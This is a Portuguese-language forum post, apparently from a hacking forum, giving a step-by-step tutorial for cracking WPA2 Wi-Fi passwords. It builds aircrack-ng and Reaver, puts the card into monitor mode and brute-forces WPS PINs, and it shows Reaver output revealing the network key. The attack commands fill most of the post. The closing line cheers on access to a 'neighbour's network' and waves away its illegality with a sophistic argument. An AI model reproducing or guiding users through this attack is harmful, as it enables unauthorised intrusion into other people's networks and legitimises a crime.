Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invasão de wpa 2 com soluções adicionais, de problemas enfrentados em diferentes distribuições de linux

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invasão de wpa 2 com soluções adicionais, de problemas enfrentados em diferentes distribuições de linux

    Crackeando redes wifi com segurança wpa2(e família wpa,wep entre outros)

    Bem para começar,o sistema operacional ter de ser Linux,com Windows (pelo menos do que eu sei )é impossível .
    Segundo ponto , tudo é feito em linhas de comando, no terminal do Linux ,nada de interface gráficas ou janelinhas coloridas ,apenas comandos!.
    Outra coisa importante , este método foi usado Ubuntu ,Mint e Debian ; em outras versões pode variar alguns comandos ,mas nada que uma boa pesquisa no Google não resolva.
    Vamos usar dois programas básicos o Air Creck 1.1 e o Reaver 1.4.
    Então mãos a obra :
    primeira coisa a ser feita e instalar algumas bibliotecas importantíssimas para não dar problema depois e levar horas ou até dias ,quebrando a cabeça tentando uma solução :

    abra o terminal e atualize seu .list:

    $ sudo apt-get update ou
    $ sudo su apt-get update

    Obs.(alguns sistemas usam o synaptic então substitua apt-get por synaptic ,ou instale :sudo install synaptic)

    instalando as bibliotecas:
    $ sudo apt-get install libpcap0.8
    $ sudo apt-get install libpcap0.8-dev
    $ sudo apt-get install sqlite3
    $ sudo apt-get install sqlite3-dev
    $ sudo apt-get install sqlite3-doc
    $ sudo apt-get install build-essential libssl-dev sqlite3
    $ sudo apt-get install gcc
    Obs.o sudo ou su ou sudo su e apenas para trabalhar como root ,a partir do primeiro não precisa mas do sudo,pois vai aparecer assim #root nome do PC @ localização #,o simbolo $ não precisa ser digitado ele já estará na lina de comando ,quando no final da linha estiver # não se usa mas o sudo ,exemplo: $ sudo apt-get install nome do programa / # apt get install nome do programa ,é a mesma coisa , o simbolo $ só indica “não logado como root “ e o simbolo # “logado como root.)

    Agora vamos ao ponto principal, instalar o Air Creck ,e ele que vai colocar sua rede em modo monitor e te fornecer o numero de MAC da rede:
    baixe o air creck aqui:httpApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    observe o local que foi salvo e abra este local na linha de comando :
    comando ls ,lista os locais e pastas dentro da home,e cd abre a parta arquivo selecionado:
    digamos que ela está nos Downloads
    EX .:nomedopc@algumcoisa:~$ ls
    aperte enter E:
    Desktop Downloads nova pasta
    desktop arquivos do msn questoes.pdf
    download outras coisas etc

    digite: cd Downloads
    apete enter e :
    Air creck 1.1

    Instalando:
    tar -zxvf aircreck-ng-1.1.tar.gz

    entrem na directoria agora criada após a extração. por exemplo:
    cd aircrack-ng-1.1

    sudo nano common.mak

    procurem pela seguinte linha :

    CFLAGS ? = -g-W-Wall- Werror-O3

    removam -Werror ficando apenas:
    CFLAGS ?= -g -W -Wall -O3

    Façam CTRL-X e guardem o ficheiro.
    agora compilem e instalem digitando:
    $ sudo make
    # make install
    se tudo correr bem já poderão começar a utilizar o programa.

    Tem outra forma de fazer esta ultima parte ,vá manualmente clicando na pasta de Downloads ache a pasta descompactada Air Creck 1.1 click nela va até o arquivo cammon.mark clic nele abrindo-o você verá um monte de letrinhas ,no seu editor terá ,a opção de pesquisar ,pesquise: O3 achando apague o werror e salve ,volte para o terminal.
    E digite

    $ sudo make

    # make install
    botando para funcionar o Air Creck:
    digite :,e veja se sua placa de rede esta com o nome de 'wlan0'
    # ifconfig
    se estiver continue desta forma ,se não anote o nome ,e substitua wlan0 pelo nome encontrado:

    # ifconfig wlan0 down
    # airmon-ng start wlan0
    Note que ele retorna, na última linha, uma mensagem como "(monitor mode enabled on mon0)". Então, passaremos a identificar "wlan0" como "mon0".
    Com nossa placa de rede sem fio já em modo monitor, vamos obter o endereço MAC do ponto de acesso:
    Código:
    # airodump-ng -i mon0
    minimize o terminal e abra outro para instalar o próximo programa O REAVER 1.4 e ele que vai te dar a senha tão desejada!
    Baixe o reaver aqui:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    $ tar -zxcf reaver-1.4.tar.gz
    $ cd reaver-[versao ou tecla "tab"]/src/
    $ ./configure
    $ sudo make
    # make install
    E agora começa a brincadeira de verdade vá até a janela minimizada do air creck copie o mec da rede desejada (o primeiro numero no formato :AA:AA:AA:AA:AA:AA
    ex: 12:34:45:78:90:11
    Vamos abrir o Reaver, passando via argumento (i) a interface (mon0, em modo monitor) e (b) o endereço MAC.
    Código:
    # reaver -i mon0 -b 12:34:45:78:90:11
    Você verá na tela algumas tentativas ("Trying pin X") sendo exibidas na tela.
    Tenha um pouco de paciência. Isto pode levar de minutos à horas (costuma nem demorar tanto assim)...
    De vez em quando ele exibe a porcentagem do progresso do trabalho atualmente:
    Código:
    [+] 0,09% complete @ (data) (2 seconds/pin)
    [+]0,15% complete @ (data)(2 seconds/pin)
    Anime-se. É normal saltos desproporcionais ao tempo, por exemplo, levar 2 minutos para caminhar 1% em um minuto e 30% em 20 segundos, de vez em quando. leva em media de uma hora a 10horas depende da força da senha.(no meu caso levou 1: 30 h )
    É normal também dar erros como "TimedOut" de vez em quando. Caso este erro esteja ocorrendo várias vezes seguidas, e o trabalho (%) não progredir, convém parar ([Ctrl] + [C], comando padrão para "parar" no terminal), esperar algum tempo e continuar depois.
    Ao recomeçar o trabalho, você verá a tela:
    Código:
    Restore previous session?
    Responda com um "y" ou “s” e o trabalho prosseguirá de onde parou.
    O problema ocorre porque alguns fabricantes de roteadores limita tentativas de PIN por um determinado período de tempo. Espere esse tempo (varia conforme o fabricante) ou resete o roteador.
    mas isto é raro.
    Finalizado o trabalho, o Reaver nos mostra uma estimativa de quanto tempo durou o cracking da rede, além do mais importante: os dados obtidos. Veja:
    Código:
    [+] Key cracked in (tempo) seconds
    [+] WPS PIN: (pin)
    [+] WPA PSK: (Êba! A senha (exatamente aqui)!!!)
    [+] AP SSID: (nome da rede)
    E bom aceso a rede do vizinho ;mas lembre-se craquear redes seguras é crime Logica: se invadiu não é mais segura, logo não é crime ,a sua consciência é que vale.
X
Working...
X